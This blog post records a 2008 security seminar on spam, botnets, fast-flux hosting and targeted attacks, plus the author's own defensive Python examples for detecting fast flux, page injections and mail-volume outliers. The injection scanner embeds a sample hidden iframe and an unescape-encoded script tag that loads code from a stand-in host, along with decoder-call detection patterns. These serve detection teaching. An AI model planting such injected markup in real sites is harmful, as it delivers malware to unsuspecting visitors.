The Evolving Security Landscape
I attended the virtual Security Seminar The Evolving Security Landscape today, as brought to us by those nice lads and lasses at The Register.
Slightly disappointingly for a technology seminar, we were specifically instructed to view the seminar with Internet Explorer, as the slides wouldn’t work in Firefox. Bad form, guys. Get this one sorted for next time, eh?
Anyway, I made a series of notes as they were talking which I’ve included here: any errors or inaccuracies are probably my fault through trying to scribble down notes too quickly. I believe the stuff will be available online later, so you can always wait for that, but if you’d like my brief (and approximate) overview of it, read on.
Mark Sunner from MessageLabs kicked us off, talking about their infrastructure, the way and the locations in which they check email, and the way in which the virus concept has changed very much from the ‘teenager in a back bedroom’ to organised criminals using botnets to pump out spam, viruses and phishing attempts.
The MessageLabs stats he showed us on a slide indicated that:
- 76.8% of email is spam
- 1 in 265 emails is a phishing attempt
- 1 in 170 emails contains a virus
The message was very much that the ‘bad guys’ behind the viruses and phishing attempts are well organised and technically very proficient:
"the bad guys are the technical equivalent of their opponents in the security industry" Mark Sunner (MessageLabs)
…although I’m not sure why they would presume that any IT professionals wouldn’t already know that, but there’s frequently an element of this in this sort of event — there’s too much background: most of the people at a security event (virtual or otherwise) will have some idea of what is going on, what we want are specifics on what is coming…
…but then Mark went on to talk about the Storm Worm (a recent outbreak) and how it used a technique known to the anti-virus people as ‘fast flux’: the malicious payload is downloaded from an internet site, but the address that the site’s hostname resolves to changes every 3 minutes. This makes it incredibly difficult to track the site down and get it switched off, which is why ‘the bad guys’ refer to it as ‘bulletproof hosting’.
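For anyone who wants to see what ‘the address changes every 3 minutes’ looks like from the defender’s side, here is a small fast-flux heuristic I have added to these notes (it is my own example, not anything shown in the seminar or used by MessageLabs). It works over repeated lookups of a hostname and scores four signs of flux: a short TTL, many distinct addresses, addresses spread across many networks, and a high turnover between lookups. The hostnames, addresses, TTLs and thresholds are all constructed or assumed; the /16 prefix is used as a crude stand-in for ‘many different ISPs’, which a real tool would replace with ASN lookups.

```python
"""Fast-flux heuristics over repeated DNS lookups.

Added example (not from the seminar or from MessageLabs). The hostnames,
addresses and TTLs below are constructed; the thresholds are assumptions a
practitioner would tune against their own resolver logs.
"""
from collections import defaultdict
from ipaddress import ip_address

# Constructed snapshots: (seconds since first lookup, hostname, TTL, A records).
# "payload.example.net" is made to look fluxed: a short TTL and a completely
# different set of addresses, spread across several networks, on every lookup.
# "www.example.com" is a plain host whose two addresses never change.
OBSERVATIONS = [
    (0,   "payload.example.net", 180, ("203.0.113.10", "198.51.100.7", "192.0.2.44")),
    (180, "payload.example.net", 180, ("203.0.113.91", "198.51.100.130", "192.0.2.9")),
    (360, "payload.example.net", 180, ("203.0.113.5", "198.51.100.200", "192.0.2.77")),
    (540, "payload.example.net", 180, ("203.0.113.150", "198.51.100.33", "192.0.2.201")),
    (0,    "www.example.com", 3600, ("192.0.2.1", "192.0.2.2")),
    (3600, "www.example.com", 3600, ("192.0.2.1", "192.0.2.2")),
    (7200, "www.example.com", 3600, ("192.0.2.2", "192.0.2.1")),
]

# Assumed thresholds (tune against your own data).
MAX_TTL = 300        # fluxed records need short TTLs so each change takes effect quickly
MIN_UNIQUE_IPS = 8   # a handful of lookups yielding many distinct addresses
MIN_PREFIXES = 3     # distinct /16 prefixes, a crude stand-in for "many ISPs/ASNs"
MIN_CHURN = 0.5      # fraction of addresses that are new on each lookup


def prefix16(addr):
    """Return the /16 of an IPv4 address as an int, used as a rough ASN proxy."""
    return int(ip_address(addr)) >> 16


def analyse(observations):
    """Compute per-hostname flux metrics from (time, host, ttl, ips) tuples."""
    by_host = defaultdict(list)
    for t, host, ttl, ips in observations:
        by_host[host].append((t, ttl, set(ips)))

    metrics = {}
    for host, snaps in by_host.items():
        snaps.sort(key=lambda s: s[0])
        seen = set().union(*(s[2] for s in snaps))
        churn_samples = []
        # Turnover: share of the current answer set that was absent from the previous one.
        for (_, _, prev), (_, _, cur) in zip(snaps, snaps[1:]):
            churn_samples.append(len(cur - prev) / len(cur))
        metrics[host] = {
            "min_ttl": min(s[1] for s in snaps),
            "unique_ips": len(seen),
            "prefixes": len({prefix16(ip) for ip in seen}),
            "churn": (sum(churn_samples) / len(churn_samples)) if churn_samples else 0.0,
        }
    return metrics


def flux_indicators(m):
    """Return the list of indicator names that fire for one host's metrics."""
    fired = []
    if m["min_ttl"] <= MAX_TTL:
        fired.append("short-ttl")
    if m["unique_ips"] >= MIN_UNIQUE_IPS:
        fired.append("many-addresses")
    if m["prefixes"] >= MIN_PREFIXES:
        fired.append("many-networks")
    if m["churn"] >= MIN_CHURN:
        fired.append("high-churn")
    return fired


def is_fast_flux(m, needed=3):
    """Flag a host when at least `needed` indicators fire (assumed rule)."""
    return len(flux_indicators(m)) >= needed


if __name__ == "__main__":
    for host, m in analyse(OBSERVATIONS).items():
        verdict = "FAST-FLUX" if is_fast_flux(m) else "ok"
        print(host, verdict, flux_indicators(m), m)
```

The reason for requiring several indicators rather than one is that a short TTL on its own is exactly what a legitimate load-balanced or CDN-fronted host looks like; it is the combination of short TTL, many addresses, many networks and near-total turnover between lookups that distinguishes a botnet-hosted site.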
What might not have been so widely known was that the growth in botnets tracks the growth in broadband internet usage very closely, because infected machines can then pump out spam at a far greater rate than they could on dial-up (plus broadband connections tend to get left ‘on’ more).
"…broadband is the air supply that makes botnets work" Mark Sunner (MessageLabs)
Mark also suggested that CAPTCHAs are now effectively broken. Spam bots can solve a CAPTCHA about 30% of the time — and the other 70% of the time they can just request a new CAPTCHA. CAPTCHAs have traditionally been used to prevent spam bots and blind people from accessing web services, but as it appears now that the only impact they are having is on blind people, there is maybe a need to move away from the traditional visual CAPTCHA?
Maybe a simple maths problem, like this?
Anyway, back to the security thingummy…
Increasingly, viruses being delivered by email are now being delivered by a hyperlink in the email, rather than as an attachment. This means that the email itself is less likely to get blocked, although it does rely on someone following the link to download the malicious payload.
More recently, the in vogue attack is to compromise a legitimate high traffic site in a small way so it is not too obvious, but to then link from that site to the malicious code.
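Since both of those last two points come down to ‘the dangerous bit is a link to somewhere else’, I have added a small scanner of my own here (not something from the seminar) showing what the ‘small, not too obvious’ change to a legitimate page tends to look like and how you would pick it out: a zero-size or hidden iframe pointing off-site, an external script from a host you do not recognise, or an inline script that decodes its payload with unescape() before writing a script tag into the page. The HTML, the allowed-hosts list and the ‘hidden’ heuristics are constructed or assumed for the example.

```python
"""Scan a page for the small injections used to hand visitors off to malicious code.

Added example, not from the seminar. The HTML below is constructed; the
legitimate-host allowlist and the "hidden" heuristics are assumptions.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, unquote

# Hosts the site is allowed to load code from (assumed for this example).
ALLOWED_HOSTS = {"www.example.com", "cdn.example.com"}

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
DECODER_RE = re.compile(r"\b(unescape|eval|String\.fromCharCode)\s*\(")

# Constructed page: ordinary markup plus two injections of the kind described
# above, a zero-size hidden iframe and an inline script that decodes its payload.
PAGE = """<html><head><title>News</title>
<script src="/js/site.js"></script>
<script src="https://cdn.example.com/lib.js"></script>
</head><body>
<h1>Headlines</h1><p>Normal content.</p>
<iframe src="http://203.0.113.7/in.cgi?3" width="0" height="0" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://198.51.100.9/x.js%22%3E%3C/script%3E'))</script>
</body></html>"""


def off_site(url):
    """True when the URL points at a host outside the allowlist (relative URLs are on-site)."""
    host = urlparse(url).hostname
    return bool(host) and host not in ALLOWED_HOSTS


class InjectionScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            reasons = []
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = (a.get("width") == "0" or a.get("height") == "0"
                      or "display:none" in style or "visibility:hidden" in style)
            if hidden:
                reasons.append("hidden")
            if off_site(a.get("src") or ""):
                reasons.append("off-site")
            if reasons:
                self.findings.append({"tag": "iframe", "src": a.get("src"), "reasons": reasons})
        elif tag == "script":
            self._in_script = True
            if off_site(a.get("src") or ""):
                self.findings.append({"tag": "script", "src": a.get("src"), "reasons": ["off-site"]})

    def handle_data(self, data):
        # HTMLParser hands us the whole body of a <script> element as one data chunk.
        if not self._in_script:
            return
        reasons = []
        if DECODER_RE.search(data):
            reasons.append("decoder-call")
        # Undo percent-encoding so URLs smuggled through unescape() become visible.
        urls = [u for u in URL_RE.findall(unquote(data)) if off_site(u)]
        if urls:
            reasons.append("off-site-url")
        if reasons:
            self.findings.append({"tag": "inline-script",
                                  "src": urls[0] if urls else None,
                                  "reasons": reasons})

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def scan(html):
    """Return the list of suspicious iframes/scripts found in the page."""
    p = InjectionScanner()
    p.feed(html)
    p.close()
    return p.findings


if __name__ == "__main__":
    for f in scan(PAGE):
        print(f["tag"], f["src"], ", ".join(f["reasons"]))
```

Run against a copy of your own site’s pages on a schedule and diff the findings against a known-good baseline; the point is not that these three heuristics are complete, but that the injected part of a compromised page is usually tiny and will not show up in anything a visitor sees, so you have to look at the markup rather than the rendered site.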
There are lots of threats arriving via email and via the web, but far fewer via IM because of the ‘walled garden’ approach: the different IM networks are only just starting to talk to one another, so currently there is less perceived ‘benefit’ for the virus/trojan writers in targeting IM, as each IM network is relatively small, whereas with email or the web an attack can cover the whole service.
In contrast with this, the incidence of specifically crafted targeted attacks is increasing massively:
- 2005 — 2 targeted attacks/week
- 2006 — 1 targeted attack/day
- 2007 (Jan) — 10 targeted attacks/day
- 2008 (Jun) — 80 targeted attacks/day
These targeted attacks appear to come from someone the recipient knows, are addressed to the user specifically (full name, often job title), and reference terms and ideas they know, because that person (or at least their job) is the specific target of the attack, rather than the standard ‘scattergun’ phish. They also come with a specifically crafted Word document constructed to cause a buffer overflow that launches a trojan.
"You can buy a purpose-built trojan, crafted just for you, that comes with a guarantee it will get past desktop protection from certain Eastern European websites…" Mark Sunner (MessageLabs)
…and they say craftsmanship is dead!
After that rather gloomy note where we seemed to be in a situation where there was only ever going to be more spam, better viruses and that virus-writers were going to rise from the dead and eat our children (or something…), Mark wrapped up his session and passed over to Jon Collins from Freeform Dynamics.
Jon said that they had posed the question “have risk concerns held you back from taking up any of the following?” and found that quite a proportion have been put off certain things…
- IP telephony — 50%
- access to systems by suppliers/ partners — 45%
- adoption of home working — 37%
When you are considering security, you need to consider things from an integration perspective: security isn’t something that can easily be boxed into many small sections, you need to consider it holistically. For example, you may have problems if you have outsourced desktop support but they don’t cover security…
Of course, if you’re having security issues because you don’t have the resources available, the good news is it should get a lot better after your security has been compromised because:
"…the easiest time to get funding for security [...] is just after you’ve had a really bad problem." Jon Collins (Freeform Dynamics)
They then looked at answering a few questions from the audience which had been emailed in. Firstly, someone asked about security issues with mobile phones and similar devices…
Mark Sunner responded that while we don’t have a particular problem with SMS spam in this country, it is a much bigger problem in Japan and Korea where the mobile phone networks are more sophisticated, so it is potentially a problem for the future for us here in the UK. Away from the phones and more looking at mobile devices such as the iPhone and similar devices, he indicated that as the device becomes more like a PC (able to access email etc), it becomes more subject to the risks of spam/viruses.
"…it’s a bit like the IM thing … at the moment it makes more sense for the bad guys to target email/web rather than [individual mobile phone devices]" Jon Collins (Freeform Dynamics)
And, as a final note, Tim Phillips from The Register asked Jon and Mark to recommend something that people should do today and something that they should do in about a month to improve security.
"something to do today — update your home computers with all necessary patches. And for next month — in terms of who has the expertise, you need to get the bridge between people who understand technical security risks, and those who understand the business risks, and get that dialogue up and running." Jon Collins (Freeform Dynamics)
"also ensure that any work computers, particularly laptops etc., are updated with patches. Look at getting encryption on mobile devices. Next month — get a handle on ‘what do you know about your own traffic?’ Do you know how many emails your organisation sends and receives in a working day? What are the patterns of access?" Mark Sunner (MessageLabs)
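That last question is the one I would actually start with, so here is a small example of my own (not from the seminar) of what ‘getting a handle on your own traffic’ can look like in practice. It reads a day of mail-gateway log lines, counts messages in and out, breaks them down by hour, and adds up outbound recipients per internal host; a host sending an order of magnitude more than the median of its peers is exactly what an infected broadband-connected desktop looks like from the mail server (which is the botnet point Mark made earlier). The log format is a simplified, constructed one rather than any real MTA’s, and the outlier rule is an assumption to be tuned against your own baseline.

```python
"""Daily mail-volume baseline per internal host, over constructed MTA log lines.

Added example, not from the seminar or MessageLabs. The log format is a
simplified, constructed one ("<timestamp> <in|out> <client IP> <sender> nrcpt=<n>");
a real deployment parses its MTA's own format. The outlier rule is an assumption.
"""
from collections import Counter
from statistics import median


def constructed_log():
    """A day of constructed lines: ten desktops sending six messages each, forty
    inbound messages, and one desktop (10.0.0.77) that has started bulk-sending."""
    lines = []
    for host in range(1, 11):
        for n in range(6):
            lines.append(f"2008-06-12T09:{n:02d}:00 out 10.0.0.{host} user{host}@example.com nrcpt=1")
    for n in range(40):
        lines.append(f"2008-06-12T10:{n:02d}:00 in 203.0.113.{n} ext{n}@example.org nrcpt=1")
    for n in range(480):
        minute, second = divmod(n, 60)   # 480 messages crammed into eight minutes
        lines.append(f"2008-06-12T13:{minute:02d}:{second:02d} out 10.0.0.77 user77@example.com nrcpt=20")
    return lines


def summarise(lines):
    """Count messages per direction, messages per (direction, hour), and
    outbound recipients per sending host."""
    messages = Counter()
    per_hour = Counter()
    recipients_out = Counter()
    for line in lines:
        ts, direction, client, _sender, nrcpt = line.split()
        n = int(nrcpt.split("=", 1)[1])
        messages[direction] += 1
        per_hour[(direction, ts[11:13])] += 1      # "HH" from the ISO timestamp
        if direction == "out":
            recipients_out[client] += n           # recipients, not messages: spam is about fan-out
    return {"messages": dict(messages),
            "per_hour": dict(per_hour),
            "recipients_out": dict(recipients_out)}


def flag_outliers(recipients_out, factor=10, minimum=50):
    """Hosts whose outbound recipient count is both above `minimum` and more than
    `factor` times the median host (assumed rule; tune against your own baseline)."""
    if not recipients_out:
        return []
    base = median(recipients_out.values())
    return sorted((host, n) for host, n in recipients_out.items()
                  if n > minimum and n > factor * base)


if __name__ == "__main__":
    s = summarise(constructed_log())
    print("messages:", s["messages"])
    for (direction, hour), count in sorted(s["per_hour"].items()):
        print(f"  {direction:>3} {hour}:00  {count}")
    print("outliers:", flag_outliers(s["recipients_out"]))
```

The median rather than the mean is used as the baseline deliberately: one spewing host would drag a mean up enough to hide itself, whereas the median of a fleet of ordinary desktops barely moves. Once you have a week of these numbers you also know what ‘normal’ looks like by hour, which is what makes a burst at 1pm from a single machine stand out.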